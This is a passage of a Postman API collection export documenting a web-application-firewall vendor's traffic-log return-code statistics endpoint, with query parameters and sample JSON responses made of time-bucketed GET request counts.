13,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 11\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660340400000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660341000000,\n                \"data\": []\n            }\n        ]\n    }\n}"}],"_postman_id":"dcf38919-c6d9-4952-bded-7cb514fe742b"},{"name":"Get Traffic Log Retcode Statics Copy","id":"468270e9-76f2-4b3a-a3b4-08916eaf8c9e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary//retcode_statistics?type={{type}}&start_time={{start_time}}&end_time={{end_time}}&page={{page}}&size={{size}}&sort_by={{sort_by}}&filter={{filter}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","traffic_summary","","retcode_statistics"],"host":["api","fortiweb-cloud-qa","com"],"query":[{"description":{"content":"<p>the type of query result only support \"summary\" and \"detail\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>the start time of timespan</p>\n","type":"text/plain"},"key":"start_time","value":"{{start_time}}"},{"description":{"content":"<p>the end time of timespan</p>\n","type":"text/plain"},"key":"end_time","value":"{{end_time}}"},{"description":{"content":"<p>the page number of requested information</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>the result table size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The field will be sorted</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"},{"description":{"content":"<p>For example, for the Agent details table, the filter is {\"http_retcode\":\"200\"}</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"a2a41a27-e334-48d0-afd0-493fe88bb2fe","name":"Get Traffic Log Retcode Statics Summary","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary//retcode_statistics?type=summary&start_time=1660255034725&end_time=1660341434725","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","","retcode_statistics"],"query":[{"key":"type","value":"summary","description":"the type of query result only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660255034725","description":"the start time of timespan"},{"key":"end_time","value":"1660341434725","description":"the end time of timespan"},{"key":"page","value":"{{page}}","description":"the page number of requested information","disabled":true},{"key":"size","value":"{{size}}","description":"the result table size","disabled":true},{"key":"sort_by","value":"{{sort_by}}","description":"The field will be sorted","disabled":true},{"key":"filter","value":"{{filter}}","description":"For example, for the Agent details table, the filter is {\"http_retcode\":\"200\"}","disabled":true}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"get\": {\n            \"count\": 52\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660255034725\",\n        \"end\": \"1660341434725\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 11\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660340400000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660341000000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"0120fd23-195f-487b-af08-7c93b016b67f","name":"Get Traffic Log Retcode Statics Detail","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary//retcode_statistics?type=details&start_time=1660255108965&end_time=1660341508965&page=1&size=5&sort_by=total_number&filter=%7B%22http_method%22%3A%22get%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","","retcode_statistics"],"query":[{"key":"type","value":"details"},{"key":"start_time","value":"1660255108965"},{"key":"end_time","value":"1660341508965"},{"key":"page","value":"1"},{"key":"size","value":"5"},{"key":"sort_by","value":"total_number"},{"key":"filter","value":"%7B%22http_method%22%3A%22get%22%7D"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"get\": {\n            \"count\": 52\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660255108965\",\n        